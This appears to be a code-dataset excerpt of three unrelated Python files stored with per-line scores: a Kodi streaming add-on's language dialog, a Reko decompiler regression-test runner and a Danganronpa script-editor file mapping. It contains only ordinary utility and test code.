" lenguajes[idx]=lenguajes[idx]+\" \"+squareRoot\n", " \n", " dia = xbmcgui.Dialog()\n", " seleccion = dia.select(\"Choice a language\", lenguajes)\n", " if seleccion == -1:return\n", " abb = languages[seleccion]\r\n", " logger.info(\"seleccion : %s %s\" %(seleccion,abb))\n", " lang = ''\n", " for count,i in enumerate(lenguajes):\n", " if seleccion == 0:\n", " lang = 'all'\n", " break\n", " \n", " if squareRoot in i:\n", " if count == seleccion:continue\n", " if abbrev[count]=='all':continue\n", " if len(lang)>0:\n", " lang = lang + \",\" + abbrev[count]\n", " else:\n", " lang = abbrev[count]\n", " if count == seleccion:\n", " if len(lang)>0:\n", " lang = lang + \",\" + abbrev[count]\n", " else:\n", " lang = abbrev[count]\n", " config.set_setting('justin_lang',lang)\n", " logger.info(\"lenguajes configurados: \"+lang)\r\n", " xbmc.executebuiltin( \"Container.Refresh\" )\n", " return \r\n", "\n", "def channelEmpty():\n", " return xbmcgui.Dialog().ok(\"Pelisalacarta - Justin TV\" ,\" \"*18+config.get_localized_string(30411))\n", "def LoginEmpty():\n", " return xbmcgui.Dialog().ok(\"Pelisalacarta - Justin TV\" ,\" \"*18+config.get_localized_string(30422))\n", "def channeloffline(channelname):\n", " return xbmcgui.Dialog().ok(\"Pelisalacarta - Justin TV\" ,config.get_localized_string(30423)%channelname)\n", "def archivesempty():\n", " return xbmcgui.Dialog().ok(\"Pelisalacarta - Justin TV\" ,\" \"*18+config.get_localized_string(30412))\r\n", "def channelANDarchivesEmpty():\r\n", " return xbmcgui.Dialog().ok(\"Pelisalacarta - Justin TV\" ,\" \"*18+config.get_localized_string(30411),\" \"*18+config.get_localized_string(30412))" ]
[ 0, 0.016129032258064516, 0, 0, 0, 0.016129032258064516, 0.11764705882352941, 0.06666666666666667, 0.0967741935483871, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.125, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.06140350877192982, 0.05042016806722689, 0.02127659574468085, 0, 0, 0, 0, 0, 0, 0, 0, 0.09836065573770492, 0.09482758620689655, 0.09734513274336283, 0.05714285714285714, 0.1865671641791045, 0.125, 0, 0.010869565217391304, 0.009900990099009901, 0.11764705882352941, 0, 0, 0.125, 0, 0, 0.058823529411764705, 0, 0, 0.05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02564102564102564, 0.03125, 0, 0, 0, 0.07692307692307693, 0, 0.02631578947368421, 0, 0.08333333333333333, 0, 0.029411764705882353, 0, 0.2, 0, 0.07177033492822966, 0.04054054054054054, 0.05555555555555555, 0, 0, 0.041666666666666664, 0, 0.021739130434782608, 0, 0.038461538461538464, 0, 0, 0, 0.0546448087431694, 0.038135593220338986, 0.05142857142857143, 0, 0.04291845493562232, 0, 0, 0.2, 0.043478260869565216, 0.03529411764705882, 0.03488372093023256, 0.017543859649122806, 0, 0, 0, 0.024390243902439025, 0, 0, 0.08333333333333333, 0.2, 0.02857142857142857, 0, 0.01904761904761905, 0, 0.02040816326530612, 0.013157894736842105, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0.012345679012345678, 0, 0.03571428571428571, 0, 0.023809523809523808, 0, 0, 0, 0.007462686567164179, 0, 0, 0, 0.017241379310344827, 0, 0, 0, 0, 0, 0, 0, 0.0196078431372549, 0, 0.03773584905660377, 0, 0, 0, 0.034482758620689655, 0, 0, 0.2, 0.04, 0, 0, 0, 0.2, 0.04225352112676056, 0, 0, 0, 0.029411764705882353, 0.017543859649122806, 0, 0, 0, 0.0430622009569378, 0, 0, 0.03225806451612903, 0, 0.017241379310344827, 0, 0, 0.04591836734693878, 0.2, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0.06060606060606061, 0, 0.0625, 0, 0.02040816326530612, 0.03333333333333333, 0, 0, 0.008547008547008548, 0, 0, 0, 0.013888888888888888, 0.08333333333333333, 0, 0.037037037037037035, 0.009708737864077669, 0, 0, 0.03125, 0.009523809523809525, 0, 0, 0.043478260869565216, 0.2, 
0.023809523809523808, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0, 0, 0, 0.031496062992125984, 0, 0.031496062992125984, 0, 0.02040816326530612, 0.013157894736842105, 0.058823529411764705, 0, 0, 0, 0.038461538461538464, 0, 0.2, 0, 0, 0, 0, 0, 0.02040816326530612, 0, 0.022988505747126436, 0, 0, 0, 0, 0, 0.043478260869565216, 0, 0, 0.03571428571428571, 0.08333333333333333, 0, 0, 0, 0, 0.0625, 0, 0, 0.021739130434782608, 0, 0.05, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0.05, 0, 0, 0, 0, 0, 0.0625, 0, 0.058823529411764705, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0.05, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0.05, 0, 0, 0, 0.0625, 0, 0, 0.05, 0, 0.07692307692307693, 0, 0, 0.0625, 0, 0, 0, 0.0625, 0, 0, 0, 0.07692307692307693, 0.0625, 0, 0, 0, 0.0625, 0, 0, 0.05, 0, 0, 0.1111111111111111, 0, 0, 0.02, 0, 0, 0.06172839506172839, 0.06557377049180328, 0.06451612903225806, 0.05128205128205128, 0.08196721311475409, 0.045454545454545456, 0.039473684210526314, 0.06779661016949153, 0.01694915254237288, 0.06060606060606061, 0.06172839506172839, 0.07407407407407407, 0.02857142857142857, 0, 0.04918032786885246, 0.09375, 0.07352941176470588, 0.0625, 0.08064516129032258, 0.05970149253731343, 0.03896103896103896, 0.06666666666666667, 0.03333333333333333, 0.06349206349206349, 0.06349206349206349, 0.06578947368421052, 0.07407407407407407, 0.02857142857142857, 0.017241379310344827, 0, 0.037037037037037035, 0, 0, 0.013333333333333334, 0, 0, 0, 0.034482758620689655, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0.009708737864077669, 0, 0, 0.1, 0.07692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.12, 0, 0, 0.058823529411764705, 0, 0, 0, 0.058823529411764705, 0, 0, 0, 0.058823529411764705, 0, 0, 0, 0.058823529411764705, 0, 0.02702702702702703, 0, 0, 0.0625, 0, 0.033707865168539325, 0.0576271186440678, 0, 0.037037037037037035, 0, 0, 0.014285714285714285, 0, 0, 0, 0.033816425120772944, 0.2, 0, 0.2, 0.047619047619047616, 0, 0, 0.04, 0, 0, 0, 0, 0.01639344262295082, 0, 
0, 0.029787234042553193, 0.023255813953488372, 0.17647058823529413, 0.16666666666666666, 0, 0.04, 0, 0, 0, 0, 0, 0.034482758620689655, 0, 0.013888888888888888, 0, 0.010869565217391304, 0, 0, 0.034482758620689655, 0, 0, 0, 0, 0.03636363636363636, 0, 0, 0, 0.023809523809523808, 0.03773584905660377, 0, 0, 0.0625, 0.01639344262295082, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0.043478260869565216, 0, 0, 0, 0, 0, 0, 0, 0, 0.020833333333333332, 0, 0, 0.02857142857142857, 0.01639344262295082, 0, 0.03225806451612903, 0.017543859649122806, 0.07692307692307693, 0, 0, 0.06666666666666667, 0, 0.037037037037037035, 0, 0.024390243902439025, 0, 0, 0, 0.1111111111111111, 0, 0.046511627906976744, 0.06666666666666667, 0.03571428571428571, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0, 0.023255813953488372, 0, 0.0425531914893617, 0.07692307692307693, 0, 0.05, 0.02912621359223301, 0.05555555555555555, 0.02912621359223301, 0.030303030303030304, 0.037037037037037035, 0.047619047619047616, 0.028846153846153848, 0.03125, 0.034722222222222224 ]
571
0.021468
false
#!/usr/bin/python # Run all regression tests on the subjects in the # $(REKO)/subjects directory tree. # Subject binaries in the directory are identified by either: # * having a dcproject file associated with them or # * a subject.cmd file containing reko command lines to execute. from optparse import OptionParser from threading import Thread from datetime import datetime import multiprocessing as mp import os import os.path import re import subprocess import sys import time import fileinput script_dir = os.path.dirname(os.path.realpath(__file__)) os.chdir(script_dir) parser = OptionParser() parser.add_option("-c", "--configuration", dest="configuration", help="define configuration (Debug, Release, etc.)", default="Debug", metavar="CONFIGURATION") parser.add_option("-o", "--check-output", dest="check_output", action="store_true", help="check output files", default=False) parser.add_option("-p", "--platform", dest="platform", help="define platform (x86, x64)", default="x64") parser.add_option("--strip-suffixes", dest="strip_suffixes", help="strip number suffixes from SSA identifiers (yes, no)", default="yes") (options, dirs) = parser.parse_args() if len(dirs) == 0: dirs = [script_dir] (options, args) = parser.parse_args() options.strip_suffixes = (options.strip_suffixes != 'no') reko_cmdline_dir = os.path.abspath(script_dir + "/../src/Drivers/CmdLine") start_dir = os.getcwd() reko_cmdline = os.path.join(reko_cmdline_dir, "bin", options.platform, options.configuration, "decompile.exe") output_extensions = [".asm", ".c", ".dis", ".h"] source_extensions = [".c"] class Job: def __init__(self, dir, rel_pname, exe_and_args): self.dir = dir self.rel_pname = rel_pname self.exe_and_args = exe_and_args # Split a command line, but allow quotation marks to # delimit file names containing spaces. 
def cmdline_split(s): a = [] inquotes = False sub = "" for c in s: if c.isspace(): if not inquotes: if len(sub): a.append(sub) sub = "" else: sub += c elif c == '"': if not inquotes: inquotes = True else: inquotes = False a.append(sub) sub = "" else: sub += c if len(sub): a.append(sub) return a # Remove output files def clear_dir(dir_name, files): for pname in files: for ext in output_extensions: if pname.endswith(ext): os.remove(os.path.join(dir_name, pname)) def strip_id_nums(dirs): for dir in dirs: for root, subdirs, files in os.walk(dir): strip_id_nums_for_dir(root, files) def strip_id_nums_for_dir(dir_name, files): for pname in files: for ext in source_extensions: if pname.endswith(ext): strip_id_nums_for_file(os.path.join(dir_name, pname)) numbered_id_regexp = re.compile('(?P<id_name>\w+)_\d+') fn_seg_name_regexp = re.compile('(?P<seg_name>fn\w+)_(?P<offset_name>\d+)') def strip_id_nums_for_file(file_name): file = fileinput.FileInput(file_name, inplace=True) for line in file: #remove EOLN line = line[:-1] line = fn_seg_name_regexp.sub('\g<seg_name>-\g<offset_name>', line) print(numbered_id_regexp.sub('\g<id_name>_n', line)) def collect_jobs(dir_name, files, pool_state): needClear = True if dir_name.endswith(".reko"): clear_dir(dir_name, files) needClear = False for pname in files: if pname.endswith(".dcproject"): if needClear: clear_dir(dir_name, files) needClear = False collect_job_in_dir(collect_reko_project, dir_name, pname, pool_state) scr_name = os.path.join(dir_name, "subject.cmd") if os.path.isfile(scr_name): if needClear: clear_dir(dir_name, files) needClear = False collect_job_in_dir(collect_command_file, dir_name, scr_name, pool_state) def collect_job_in_dir(fn, dir, fname, pool_state): oldDir = os.getcwd() os.chdir(dir) fn(dir, fname, pool_state) os.chdir(oldDir) def collect_reko_project(dir, pname, pool_state): return collect_job([reko_cmdline, pname], dir, pname, pool_state) # Remove any comment on the line def strip_comment(line): return 
re.sub('#.*', '', line) # Find all commands to execute in a subject.cmd file def collect_command_file(dir, scr_name, jobs): f = open("subject.cmd") lines = f.readlines() f.close() if (lines is None): return for line in lines: line = strip_comment(line) exe_and_args = cmdline_split(line) if len(exe_and_args) <= 1: continue exe_and_args[0] = reko_cmdline # Assumes the binary's name is the last item on the command line. collect_job(exe_and_args, dir, exe_and_args[-1], jobs) def collect_job(exe_and_args, dir, pname, jobs): jobs.append(Job(dir, pname, exe_and_args)) def start_jobs(jobs, pool): results = [] for job in jobs: results.append(pool.apply_async(processor, (job.dir, job.rel_pname, job.exe_and_args))) return results # Order jobs by descending weight; long-running jobs will be started first. def schedule_jobs(jobs, weights): for job in jobs: if job.rel_pname in weights: job.weight = weights[job.rel_pname] else: job.weight = 1.0 return sorted(jobs,key=lambda j: j.weight,reverse=True) def processor(dir, rel_pname, exe_and_args): os.chdir(dir) # print("Processor %s %s %s" % (dir, rel_pname, exe_and_args)) banner = os.path.join(os.path.relpath(dir, start_dir), rel_pname) if sys.platform.startswith("linux") or sys.platform == "darwin": exe_and_args.insert(0, "mono") exe_and_args.insert(1, "--debug") # enables line numbers in stack traces output_lines = "=== " + banner + "\n" start = time.time() sys.stderr.write("%s: Starting %s\n" % (datetime.now().strftime("%H:%M:%S.%f"), banner)) proc = subprocess.Popen(exe_and_args, stdout=subprocess.PIPE, universal_newlines=True) out = proc.communicate()[0] new_weight = time.time() - start if "error" in out.lower(): output_lines += "*** " + banner + "\n" output_lines += out return (rel_pname, new_weight, output_lines) def check_output_files(): proc = subprocess.Popen(["git", "status", "."], stdout=subprocess.PIPE, universal_newlines=True) out = proc.communicate()[0] print(out) directoryClean = False if "working directory clean" in 
out.lower(): directoryClean = True if "working tree clean" in out.lower(): directoryClean = True if directoryClean: print("Output files are the same as in repository") else: print("Output files differ from repository") exit(1) def load_weights(filename): if os.path.isfile(filename): with open(filename) as f: lines = f.readlines() splits= [line.split("|") for line in lines] weights = { path: float(weight) for (path, weight) in splits } return weights else: return {} def save_weights(weights, filename): with open(filename, "w") as f: for k in weights: f.write("%s|%r\n" % (k, weights[k])) TIMEOUT = 120 # seconds WEIGHTS_FILENAME = "subject_weights.txt" if __name__ == '__main__': mp.freeze_support() # Needed to keep Windows happy. start_time = time.time() weights = load_weights(WEIGHTS_FILENAME) jobs = [] for dir in dirs: for root, subdirs, files in os.walk(dir): collect_jobs(root, files, jobs) jobs = schedule_jobs(jobs, weights) pool = mp.Pool(processes=8) queue = start_jobs(jobs, pool) new_weights = {} outputs = [] for (i, result) in enumerate(queue): try: x = result.get(timeout=TIMEOUT) new_weights[x[0]] = x[1] outputs.append(x[2]) except: outputs.append("!!! " + jobs[i].rel_pname + " timed out\n"); for output in sorted(outputs): sys.stdout.write(output) save_weights(new_weights, WEIGHTS_FILENAME) if options.strip_suffixes: print("Stripping SSA identifier numbers") strip_id_nums(dirs) if options.check_output: check_output_files() print("Decompiled %s binaries in %.2f seconds ---" % (len(queue), time.time() - start_time))
[ "#!/usr/bin/python\n", "# Run all regression tests on the subjects in the \n", "# $(REKO)/subjects directory tree.\n", "# Subject binaries in the directory are identified by either:\n", "# * having a dcproject file associated with them or\n", "# * a subject.cmd file containing reko command lines to execute.\n", "\n", "from optparse import OptionParser\n", "from threading import Thread\n", "from datetime import datetime\n", "import multiprocessing as mp\n", "import os\n", "import os.path\n", "import re\n", "import subprocess\n", "import sys\n", "import time\n", "import fileinput\n", "\n", "script_dir = os.path.dirname(os.path.realpath(__file__))\n", "os.chdir(script_dir)\n", "\n", "parser = OptionParser()\n", "parser.add_option(\"-c\", \"--configuration\", dest=\"configuration\",\n", " help=\"define configuration (Debug, Release, etc.)\",\n", " default=\"Debug\", metavar=\"CONFIGURATION\")\n", "parser.add_option(\"-o\", \"--check-output\", dest=\"check_output\",\n", " action=\"store_true\",\n", " help=\"check output files\", default=False)\n", "parser.add_option(\"-p\", \"--platform\", dest=\"platform\",\n", " help=\"define platform (x86, x64)\",\n", " default=\"x64\")\n", "parser.add_option(\"--strip-suffixes\", dest=\"strip_suffixes\",\n", " help=\"strip number suffixes from SSA identifiers (yes, no)\",\n", " default=\"yes\")\n", "(options, dirs) = parser.parse_args()\n", "if len(dirs) == 0:\n", " dirs = [script_dir]\n", "(options, args) = parser.parse_args()\n", "options.strip_suffixes = (options.strip_suffixes != 'no')\n", "\n", "reko_cmdline_dir = os.path.abspath(script_dir + \"/../src/Drivers/CmdLine\")\n", "\n", "start_dir = os.getcwd()\n", "\n", "reko_cmdline = os.path.join(reko_cmdline_dir, \"bin\", options.platform, options.configuration, \"decompile.exe\")\n", "\n", "output_extensions = [\".asm\", \".c\", \".dis\", \".h\"]\n", "source_extensions = [\".c\"]\n", "\n", "class Job:\n", " def __init__(self, dir, rel_pname, exe_and_args):\n", " self.dir = 
dir\n", " self.rel_pname = rel_pname\n", " self.exe_and_args = exe_and_args\n", "\n", "# Split a command line, but allow quotation marks to\n", "# delimit file names containing spaces.\n", "def cmdline_split(s):\n", " a = []\n", " inquotes = False\n", " sub = \"\"\n", " for c in s:\n", " if c.isspace():\n", " if not inquotes:\n", " if len(sub):\n", " a.append(sub)\n", " sub = \"\"\n", " else:\n", " sub += c\n", " elif c == '\"':\n", " if not inquotes:\n", " inquotes = True\n", " else:\n", " inquotes = False\n", " a.append(sub)\n", " sub = \"\"\n", " else:\n", " sub += c\n", " if len(sub):\n", " a.append(sub)\n", " return a\n", "\n", "# Remove output files\n", "def clear_dir(dir_name, files):\n", " for pname in files:\n", " for ext in output_extensions:\n", " if pname.endswith(ext):\n", " os.remove(os.path.join(dir_name, pname))\n", "\n", "def strip_id_nums(dirs):\n", " for dir in dirs:\n", " for root, subdirs, files in os.walk(dir):\n", " strip_id_nums_for_dir(root, files)\n", "\n", "def strip_id_nums_for_dir(dir_name, files):\n", " for pname in files:\n", " for ext in source_extensions:\n", " if pname.endswith(ext):\n", " strip_id_nums_for_file(os.path.join(dir_name, pname))\n", "\n", "numbered_id_regexp = re.compile('(?P<id_name>\\w+)_\\d+')\n", "fn_seg_name_regexp = re.compile('(?P<seg_name>fn\\w+)_(?P<offset_name>\\d+)')\n", "\n", "def strip_id_nums_for_file(file_name):\n", " file = fileinput.FileInput(file_name, inplace=True)\n", " for line in file:\n", " #remove EOLN\n", " line = line[:-1]\n", " line = fn_seg_name_regexp.sub('\\g<seg_name>-\\g<offset_name>', line)\n", " print(numbered_id_regexp.sub('\\g<id_name>_n', line))\n", "\n", "def collect_jobs(dir_name, files, pool_state):\n", " needClear = True\n", " if dir_name.endswith(\".reko\"):\n", " clear_dir(dir_name, files)\n", " needClear = False\n", " for pname in files:\n", " if pname.endswith(\".dcproject\"):\n", " if needClear:\n", " clear_dir(dir_name, files)\n", " needClear = False\n", " 
collect_job_in_dir(collect_reko_project, dir_name, pname, pool_state)\n", "\n", " scr_name = os.path.join(dir_name, \"subject.cmd\")\n", " if os.path.isfile(scr_name):\n", " if needClear:\n", " clear_dir(dir_name, files)\n", " needClear = False\n", " collect_job_in_dir(collect_command_file, dir_name, scr_name, pool_state)\n", "\n", "def collect_job_in_dir(fn, dir, fname, pool_state):\n", " oldDir = os.getcwd()\n", " os.chdir(dir)\n", " fn(dir, fname, pool_state)\n", " os.chdir(oldDir)\n", "\n", "def collect_reko_project(dir, pname, pool_state):\n", " return collect_job([reko_cmdline, pname], dir, pname, pool_state)\n", "\n", "# Remove any comment on the line\n", "def strip_comment(line):\n", " return re.sub('#.*', '', line)\n", "\n", "# Find all commands to execute in a subject.cmd file\n", "def collect_command_file(dir, scr_name, jobs):\n", " f = open(\"subject.cmd\")\n", " lines = f.readlines()\n", " f.close()\n", " if (lines is None):\n", " return\n", " for line in lines:\n", " line = strip_comment(line)\n", " exe_and_args = cmdline_split(line)\n", " if len(exe_and_args) <= 1:\n", " continue\n", " exe_and_args[0] = reko_cmdline\n", " # Assumes the binary's name is the last item on the command line.\n", " collect_job(exe_and_args, dir, exe_and_args[-1], jobs)\n", "\n", "\n", "def collect_job(exe_and_args, dir, pname, jobs):\n", " jobs.append(Job(dir, pname, exe_and_args))\n", "\n", "\n", "\n", "def start_jobs(jobs, pool):\n", " results = []\n", " for job in jobs:\n", " results.append(pool.apply_async(processor, (job.dir, job.rel_pname, job.exe_and_args)))\n", " return results\n", "\n", "# Order jobs by descending weight; long-running jobs will be started first.\n", "def schedule_jobs(jobs, weights):\n", " for job in jobs:\n", " if job.rel_pname in weights:\n", " job.weight = weights[job.rel_pname]\n", " else:\n", " job.weight = 1.0\n", " return sorted(jobs,key=lambda j: j.weight,reverse=True)\n", "\n", "def processor(dir, rel_pname, exe_and_args):\n", " 
os.chdir(dir)\n", " # print(\"Processor %s %s %s\" % (dir, rel_pname, exe_and_args))\n", " banner = os.path.join(os.path.relpath(dir, start_dir), rel_pname)\n", " if sys.platform.startswith(\"linux\") or sys.platform == \"darwin\":\n", " exe_and_args.insert(0, \"mono\")\n", " exe_and_args.insert(1, \"--debug\") # enables line numbers in stack traces\n", " output_lines = \"=== \" + banner + \"\\n\"\n", " start = time.time()\n", " sys.stderr.write(\"%s: Starting %s\\n\" % (datetime.now().strftime(\"%H:%M:%S.%f\"), banner))\n", "\n", " proc = subprocess.Popen(exe_and_args,\n", " stdout=subprocess.PIPE,\n", " universal_newlines=True)\n", " out = proc.communicate()[0]\n", " new_weight = time.time() - start\n", " if \"error\" in out.lower():\n", " output_lines += \"*** \" + banner + \"\\n\"\n", " output_lines += out\n", " return (rel_pname, new_weight, output_lines)\n", "\n", "def check_output_files():\n", " proc = subprocess.Popen([\"git\", \"status\", \".\"],\n", " stdout=subprocess.PIPE,\n", " universal_newlines=True)\n", " out = proc.communicate()[0]\n", " print(out)\n", " directoryClean = False\n", " if \"working directory clean\" in out.lower():\n", " directoryClean = True\n", " if \"working tree clean\" in out.lower():\n", " directoryClean = True\n", " if directoryClean:\n", " print(\"Output files are the same as in repository\")\n", " else:\n", " print(\"Output files differ from repository\")\n", " exit(1)\n", "\n", "\n", "def load_weights(filename):\n", " if os.path.isfile(filename):\n", " with open(filename) as f:\n", " lines = f.readlines()\n", " splits= [line.split(\"|\") for line in lines]\n", " weights = { path: float(weight) for (path, weight) in splits }\n", " return weights\n", " else:\n", " return {}\n", "\n", "def save_weights(weights, filename):\n", " with open(filename, \"w\") as f:\n", " for k in weights:\n", " f.write(\"%s|%r\\n\" % (k, weights[k]))\n", "\n", "TIMEOUT = 120 # seconds\n", "WEIGHTS_FILENAME = \"subject_weights.txt\"\n", "\n", "if 
__name__ == '__main__':\n", " mp.freeze_support() # Needed to keep Windows happy.\n", "\n", " start_time = time.time()\n", "\n", " weights = load_weights(WEIGHTS_FILENAME)\n", "\n", " jobs = []\n", " for dir in dirs:\n", " for root, subdirs, files in os.walk(dir):\n", " collect_jobs(root, files, jobs)\n", "\n", " jobs = schedule_jobs(jobs, weights)\n", " pool = mp.Pool(processes=8)\n", " queue = start_jobs(jobs, pool)\n", " new_weights = {}\n", " outputs = []\n", " for (i, result) in enumerate(queue):\n", " try:\n", " x = result.get(timeout=TIMEOUT)\n", " new_weights[x[0]] = x[1]\n", " outputs.append(x[2])\n", " except:\n", " outputs.append(\"!!! \" + jobs[i].rel_pname + \" timed out\\n\");\n", " for output in sorted(outputs):\n", " sys.stdout.write(output)\n", "\n", " save_weights(new_weights, WEIGHTS_FILENAME)\n", " if options.strip_suffixes:\n", " print(\"Stripping SSA identifier numbers\")\n", " strip_id_nums(dirs)\n", " if options.check_output:\n", " check_output_files()\n", "\n", " print(\"Decompiled %s binaries in %.2f seconds ---\" % (len(queue), time.time() - start_time))\n" ]
[ 0, 0.0196078431372549, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009009009009009009, 0, 0, 0, 0, 0.09090909090909091, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03125, 0, 0, 0, 0, 0, 0.04, 0, 0, 0, 0, 0.022727272727272728, 0, 0, 0, 0, 0, 0.05357142857142857, 0.02631578947368421, 0, 0.02564102564102564, 0, 0, 0.047619047619047616, 0, 0.02631578947368421, 0.01639344262295082, 0, 0.02127659574468085, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0.019230769230769232, 0, 0, 0, 0, 0, 0.02, 0, 0, 0, 0.04, 0, 0, 0, 0.02127659574468085, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0.010416666666666666, 0, 0, 0, 0.029411764705882353, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0.022222222222222223, 0, 0, 0, 0, 0, 0.024691358024691357, 0, 0, 0.010752688172043012, 0, 0, 0.03125, 0.030303030303030304, 0, 0, 0, 0, 0, 0, 0, 0.038461538461538464, 0, 0.03125, 0.030303030303030304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.017857142857142856, 0.02666666666666667, 0, 0, 0, 0, 0.02702702702702703, 0, 0, 0, 0, 0.04, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.0625, 0.0136986301369863, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010309278350515464 ]
273
0.004129
false
################################################################################ ### Copyright © 2012-2013 BlackDragonHunt ### ### This file is part of the Super Duper Script Editor. ### ### The Super Duper Script Editor is free software: you can redistribute it ### and/or modify it under the terms of the GNU General Public License as ### published by the Free Software Foundation, either version 3 of the License, ### or (at your option) any later version. ### ### The Super Duper Script Editor is distributed in the hope that it will be ### useful, but WITHOUT ANY WARRANTY; without even the implied warranty of ### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ### GNU General Public License for more details. ### ### You should have received a copy of the GNU General Public License ### along with the Super Duper Script Editor. ### If not, see <http://www.gnu.org/licenses/>. ################################################################################ from bitstring import ConstBitStream, BitStream import copy import logging import os from enum import Enum import common from script_pack import ScriptPack from sprite import SpriteId, SPRITE_TYPE from text_format import TEXT_FORMATS, TEXT_ORIENT, TEXT_ALIGN from voice import VoiceId _LOGGER_NAME = common.LOGGER_NAME + "." 
+ __name__ _LOGGER = logging.getLogger(_LOGGER_NAME) NONSTOP_DIR = os.path.join("all", "bin") NONSTOP_LINE_TYPE = Enum("normal", "chatter", "unknown1", "unknown3", "unknown4", "hanron1", "hanron2", "hanron3", "hanron4", "hanron5", "hanron6", "hanron7", "hanron8", "hanron_mc") LINE_TYPE_MAP = { ConstBitStream(hex = "0x00000000"): NONSTOP_LINE_TYPE.normal, ConstBitStream(hex = "0x01000100"): NONSTOP_LINE_TYPE.chatter, ConstBitStream(hex = "0x01000000"): NONSTOP_LINE_TYPE.unknown1, ConstBitStream(hex = "0x03000000"): NONSTOP_LINE_TYPE.unknown3, ConstBitStream(hex = "0x04000000"): NONSTOP_LINE_TYPE.unknown4, ConstBitStream(hex = "0x00000100"): NONSTOP_LINE_TYPE.hanron1, ConstBitStream(hex = "0x00000200"): NONSTOP_LINE_TYPE.hanron2, ConstBitStream(hex = "0x00000300"): NONSTOP_LINE_TYPE.hanron3, ConstBitStream(hex = "0x00000400"): NONSTOP_LINE_TYPE.hanron4, ConstBitStream(hex = "0x00000500"): NONSTOP_LINE_TYPE.hanron5, ConstBitStream(hex = "0x00000600"): NONSTOP_LINE_TYPE.hanron6, ConstBitStream(hex = "0x00000700"): NONSTOP_LINE_TYPE.hanron7, ConstBitStream(hex = "0x00000800"): NONSTOP_LINE_TYPE.hanron8, ConstBitStream(hex = "0x02000000"): NONSTOP_LINE_TYPE.hanron_mc, } DIR_MAP = { "nonstop_01_001.dat": "e01_202_001.lin", "nonstop_01_002.dat": "e01_204_001.lin", "nonstop_01_003.dat": "e01_208_001.lin", "nonstop_01_004.dat": "e01_210_001.lin", "nonstop_01_005.dat": "e01_212_001.lin", "nonstop_01_006.dat": "e01_216_001.lin", "nonstop_01_007.dat": "e01_222_001.lin", "nonstop_01_008.dat": "e01_224_001.lin", "nonstop_01_009.dat": "e01_228_001.lin", "hanron_01_001.dat": "e01_206_001.lin", "hanron_01_002.dat": "e01_214_001.lin", "hanron_01_003.dat": "e01_226_001.lin", "nonstop_02_001.dat": "e02_203_001.lin", "nonstop_02_002.dat": "e02_205_001.lin", "nonstop_02_003.dat": "e02_207_001.lin", "nonstop_02_004.dat": "e02_209_001.lin", "nonstop_02_005.dat": "e02_213_001.lin", "nonstop_02_006.dat": "e02_215_001.lin", "nonstop_02_007.dat": "e02_223_001.lin", "hanron_02_001.dat": 
"e02_217_001.lin", "hanron_02_002.dat": "e02_225_001.lin", "nonstop_03_001.dat": "", "nonstop_03_002.dat": "", "nonstop_03_003.dat": "", "nonstop_03_004.dat": "", "nonstop_03_005.dat": "", "nonstop_03_006.dat": "", "nonstop_03_007.dat": "", "nonstop_03_008.dat": "e03_235_001.lin", "hanron_03_001.dat": "e03_212_001.lin", "hanron_03_002.dat": "e03_220_001.lin", "nonstop_04_001.dat": "", "nonstop_04_002.dat": "", "nonstop_04_003.dat": "", "nonstop_04_004.dat": "", "nonstop_04_005.dat": "", "nonstop_04_006.dat": "", "nonstop_04_007.dat": "", "nonstop_04_008.dat": "", "nonstop_04_009.dat": "", "nonstop_04_010.dat": "", "hanron_04_001.dat": "e04_208_001.lin", "hanron_04_002.dat": "e04_227_001.lin", "hanron_04_003.dat": "e04_245_001.lin", "nonstop_05_001.dat": "", "nonstop_05_002.dat": "", "nonstop_05_003.dat": "", "nonstop_05_004.dat": "", "nonstop_05_005.dat": "", "nonstop_05_006.dat": "", "nonstop_05_007.dat": "", "hanron_05_001.dat": "e05_204_001.lin", "hanron_05_002.dat": "e05_242_001.lin", "nonstop_06_001.dat": "", "nonstop_06_002.dat": "", "nonstop_06_003.dat": "", "nonstop_06_004.dat": "", "nonstop_06_005.dat": "", "nonstop_06_006.dat": "", "nonstop_06_007.dat": "", "nonstop_06_008.dat": "", "nonstop_06_009.dat": "", "nonstop_06_017.dat": "", "nonstop_14_001.dat": "", "nonstop_14_002.dat": "", "nonstop_14_003.dat": "", "nonstop_14_004.dat": "", "nonstop_14_005.dat": "", "nonstop_14_006.dat": "", "nonstop_14_007.dat": "", "nonstop_14_008.dat": "", "kokoro_09_001.dat": "e09_701_101.lin", "kokoro_09_002.dat": "e09_702_101.lin", "kokoro_09_003.dat": "e09_703_101.lin", 